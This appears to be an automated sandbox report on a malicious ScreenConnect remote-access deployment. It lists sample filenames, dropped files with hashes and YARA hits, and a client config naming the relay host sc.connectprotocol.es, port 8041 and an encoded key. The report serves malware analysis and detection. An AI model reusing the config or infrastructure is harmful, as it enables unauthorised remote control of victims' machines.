                                                                        sc.connectprotocol.es | f53WqfzzNt.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | hB52OUUCE2.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | lCwus2wfk6.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | pbenHWj8JO.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | 1g6DULljd2.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | 2nmtr41l0S.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | pbenHWj8JO.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        sc.connectprotocol.es | lCwus2wfk6.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                        54583US | f53WqfzzNt.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | hB52OUUCE2.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | lCwus2wfk6.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | pbenHWj8JO.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | 1g6DULljd2.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | 2nmtr41l0S.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | pbenHWj8JO.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        54583US | lCwus2wfk6.exe | malicious | ScreenConnect Tool | 38.69.12.167
                                                                        No context
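                                                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | f53WqfzzNt.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | hB52OUUCE2.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | lCwus2wfk6.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | pbenHWj8JO.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | VVs9SAqm5N.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 1g6DULljd2.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | 2nmtr41l0S.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll | pbenHWj8JO.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | f53WqfzzNt.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 6IqUjK9Koj.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | hB52OUUCE2.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | lCwus2wfk6.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | pbenHWj8JO.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | VVs9SAqm5N.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 1g6DULljd2.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | 2nmtr41l0S.exe | malicious | ScreenConnect Tool |
                                                                        C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll | pbenHWj8JO.exe | malicious | ScreenConnect Tool |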
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):219471
                                                                                                            Entropy (8bit):6.58204371630186
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:UW9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG4:UWuH2aCGw1ST1wQLdqv4
                                                                                                            MD5:D6F423C84C4668BEACF7F1A068B22074
                                                                                                            SHA1:DCAF4C7045F4C4C582D91B7CA936F1FA7F4A6473
                                                                                                            SHA-256:AA09E9BE5C5E9831A9F3D125010245A1D0EE11634E9A628E01E612DF23E0FB1E
                                                                                                            SHA-512:9F0AAC6CC1F065A5E9A41F69C2295057E32F3741D12AB33D3C3385FB14CEC9EDE2276F9173C740934C541640B2B43613F55A8FC4E48EFD2F7124AB4A893006A5
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\6699fe.rbs, Author: Joe Security
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):50133
                                                                                                            Entropy (8bit):4.759054454534641
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                            MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                            SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                            SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                            SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26722
                                                                                                            Entropy (8bit):7.7401940386372345
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                            MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                            SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                            SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                            SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):197120
                                                                                                            Entropy (8bit):6.586775768189165
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
                                                                                                            MD5:3724F06F3422F4E42B41E23ACB39B152
                                                                                                            SHA1:1220987627782D3C3397D4ABF01AC3777999E01C
                                                                                                            SHA-256:EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
                                                                                                            SHA-512:509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: f53WqfzzNt.exe, Detection: malicious
                                                                                                            • Filename: 6IqUjK9Koj.exe, Detection: malicious
                                                                                                            • Filename: hB52OUUCE2.exe, Detection: malicious
                                                                                                            • Filename: lCwus2wfk6.exe, Detection: malicious
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious
                                                                                                            • Filename: VVs9SAqm5N.exe, Detection: malicious
                                                                                                            • Filename: 1g6DULljd2.exe, Detection: malicious
                                                                                                            • Filename: 2nmtr41l0S.exe, Detection: malicious
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):68096
                                                                                                            Entropy (8bit):6.06942231395039
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                                            MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                            SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                            SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                            SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: f53WqfzzNt.exe, Detection: malicious
                                                                                                            • Filename: 6IqUjK9Koj.exe, Detection: malicious
                                                                                                            • Filename: hB52OUUCE2.exe, Detection: malicious
                                                                                                            • Filename: lCwus2wfk6.exe, Detection: malicious
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious
                                                                                                            • Filename: VVs9SAqm5N.exe, Detection: malicious
                                                                                                            • Filename: 1g6DULljd2.exe, Detection: malicious
                                                                                                            • Filename: 2nmtr41l0S.exe, Detection: malicious
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):95512
                                                                                                            Entropy (8bit):6.504684691533346
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                            MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                            SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                            SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                            SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):548864
                                                                                                            Entropy (8bit):6.034211651049746
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                            MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                            SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                            SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                            SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1721856
                                                                                                            Entropy (8bit):6.639085961200334
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                            MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                            SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                            SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                            SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):260168
                                                                                                            Entropy (8bit):6.416438906122177
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                                            MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                            SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                            SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                            SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61208
                                                                                                            Entropy (8bit):6.310126082367387
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                            MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                            SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                            SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                            SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):266
                                                                                                            Entropy (8bit):4.842791478883622
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):602392
                                                                                                            Entropy (8bit):6.176232491934078
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                            MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                            SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                            SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                            SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):266
                                                                                                            Entropy (8bit):4.842791478883622
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                            Malicious:true
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):842248
                                                                                                            Entropy (8bit):6.268561504485627
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                                            MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                                            SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                                            SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                                            SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):81688
                                                                                                            Entropy (8bit):5.8618809599146005
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                                            MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                                            SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                                            SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                                            SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):266
                                                                                                            Entropy (8bit):4.842791478883622
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (463), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):953
                                                                                                            Entropy (8bit):5.76285111936072
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2dL9hK6E4dl/kGuanOt+qPySnLb5pUgzWvH:chh7HHiqo1nLHHWv
                                                                                                            MD5:D4A9F5EA2DA4BBD0CB33743E9BC848CE
                                                                                                            SHA1:BBEA3254495249FA96D667391BA4E90F92CBACD5
                                                                                                            SHA-256:644282531083B8CDE902CDBDB71BDC55C3AAE9225072465B66640C16A5923F27
                                                                                                            SHA-512:00186C860DAF6690F5A5D0E2B90DC76A049759562C52407BC51662F775FDE6DFFEFD036ACC4C8ADC9955E0D8F39897E6E11BDDBCF0003FE279B6D9DE31C63EC6
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=sc.connectprotocol.es&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.35901589905449205
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
                                                                                                            MD5:C788EDB928436D0CE10A5BF198837D8A
                                                                                                            SHA1:F104B6AB797E0B16362BFB69F5000407CE6EFFD8
                                                                                                            SHA-256:E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
                                                                                                            SHA-512:61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.7304551290048233
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0g:9JZj5MiKNnNhoxu1
                                                                                                            MD5:20D68F143D5EC60E389EE035B3B76030
                                                                                                            SHA1:7B6F68177765B859E0F176D0257B5615B7591588
                                                                                                            SHA-256:A003F0EB0E78D880C8A735EBD286A5E5B11489CE7CE1A8C8D27B05C079EC32F0
                                                                                                            SHA-512:A67C9B6F16293FC776C4AD5C224E61DB5EF6F4DDB558BB3538C5A49AAB36B75B027A0E99BBDEC78DAFC2C3CF9D5FCEE1799679AF543C736FD58B8E51FDAEB2B0
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0xcc4131d6, page size 16384, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.6291579939223056
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:PSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Paza9iJa+2UtmOQOL
                                                                                                            MD5:EAC247C67AA79428818BF83481CE5DF1
                                                                                                            SHA1:34B6EF692727D9211CCE92174F6CEB853AB2AE76
                                                                                                            SHA-256:14DBFBDFED2596B3772F1D11879B75D15D3A42A3E5225C33DD288256D21F7608
                                                                                                            SHA-512:B6615A27DB651020A02BDF86B67916418DFDF4CDB15E5287F11707D6C37A33C7F505A45D1910BE808687E867772D5AA4F8282A0E4634E6A9BD8CD3208CAB8024
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16384
                                                                                                            Entropy (8bit):0.0796328158147682
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:9t/OetYeAsZ8FeeykDRZUF/JdkFillHol///lZMPCyH:f/rzReTz4J9po5
                                                                                                            MD5:ECF80663C4CBC2784F0FA6C571C63691
                                                                                                            SHA1:DEB4153DAF27EBD0C7AD9E1EE619C351F5439941
                                                                                                            SHA-256:C19E727D61A83D9086413956C3DF2BA822ABD9BB82B75CEF5CBF417E348787D5
                                                                                                            SHA-512:159B4AC0D6953348D40A75036CB436C1C3108B84B8725A39FDB31C9DF7CB483300C7DF8C95A0FE9D4B0961E3EB07D07226998D89C5C2A4C4A8361178DFB5A208
                                                                                                            Malicious:false
                                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):746
                                                                                                            Entropy (8bit):5.349174276064173
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
